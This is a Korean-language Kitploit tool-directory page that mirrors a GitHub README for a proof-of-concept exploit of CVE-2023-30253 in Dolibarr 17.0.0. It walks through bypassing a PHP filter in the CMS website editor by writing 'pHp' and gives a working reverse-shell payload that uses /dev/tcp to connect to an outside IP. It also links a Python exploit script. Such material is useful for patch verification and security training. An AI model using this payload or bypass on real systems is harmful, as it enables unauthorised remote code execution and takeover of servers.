Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Dolibarr-17.0.0-Exploit-CVE-2023-30253 — Dolibarr 17.0.0에서 CMS Website plugin (core)이 활성화된 상태에서 인증된 공격자는 애플리케이션 제한을 우회하는 PHP 코드 삽입을 통해 원격 명령 실행을 얻을 수 있습니다. | Kitploit
도구/GitHubGitHub/dollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubdollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253

Dolibarr-17.0.0-Exploit-CVE-2023-30253

Dolibarr 17.0.0에서 CMS Website plugin (core)이 활성화된 상태에서 인증된 공격자는 애플리케이션 제한을 우회하는 PHP 코드 삽입을 통해 원격 명령 실행을 얻을 수 있습니다.

저장소 보기
9312년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Readme.md

CVE-2023-30253

CVE-2023-30253는 Dolibarr 소프트웨어의 보안 결함으로, 인증된 사용자가 주입된 데이터에서 대문자 변조 기술을 활용하여 원격 코드를 실행할 수 있게 합니다.

영향

이 취약점은 악의적인 공격자에 의한 무단 원격 코드 실행으로 이어질 수 있으며, 영향을 받는 시스템의 보안과 무결성에 심각한 위협을 가합니다. 이 취약점은 Dolibarr 17.0.1에서 수정되었습니다.

참고

https://www.swascan.com/security-advisory-dolibarr-17-0-0/

https://github.com/Dolibarr/dolibarr


Proof of Concept

다음 PoC는 리버스 셸을 수동으로 획득하는 방법을 보여줍니다.

Untitled.png

테스트 사용자로 로그인한 후, 웹사이트를 생성/수정할 수 있습니다.

Untitled (1).png

먼저 웹사이트를 생성한 다음, 페이지를 생성합니다.

Untitled (2).png

Untitled

웹사이트와 페이지를 생성한 후, 쌍안경 아이콘을 클릭하면 생성한 페이지가 새 탭에서 열립니다.

이제 HTML 소스 편집을 클릭합니다.

Untitled (4).png

여기서 PHP 코드를 추가하려고 시도할 수 있지만, PHP 코드 작성을 막는 일종의 필터가 있습니다. 이는 php 단어의 형식을 변경하여 쉽게 우회할 수 있습니다.

Untitled (5).png

php 단어의 형식을 pHp로 변경한 후, 성공적으로 저장된 것을 확인할 수 있습니다.

Untitled (6).png

페이지로 이동하면, 삽입한 PHP 코드가 작동하는 것을 볼 수 있습니다.

이제 리버스 셸을 얻기 위해 netcat 리스너를 설정합니다.

Untitled (7).png

Untitled (8).png

그런 다음 리버스 셸 코드 <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>를 추가합니다.

이제 웹사이트를 열면 리버스 셸이 제공됩니다.

Untitled (9).png




Python 코드를 사용하면 더 쉽게 할 수 있습니다.

Untitled

netcat 리스너를 설정합니다.

Untitled

스크립트를 실행하면 리버스 셸을 얻을 수 있습니다.

Untitled 스크립트 작성자: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

도구 다운로드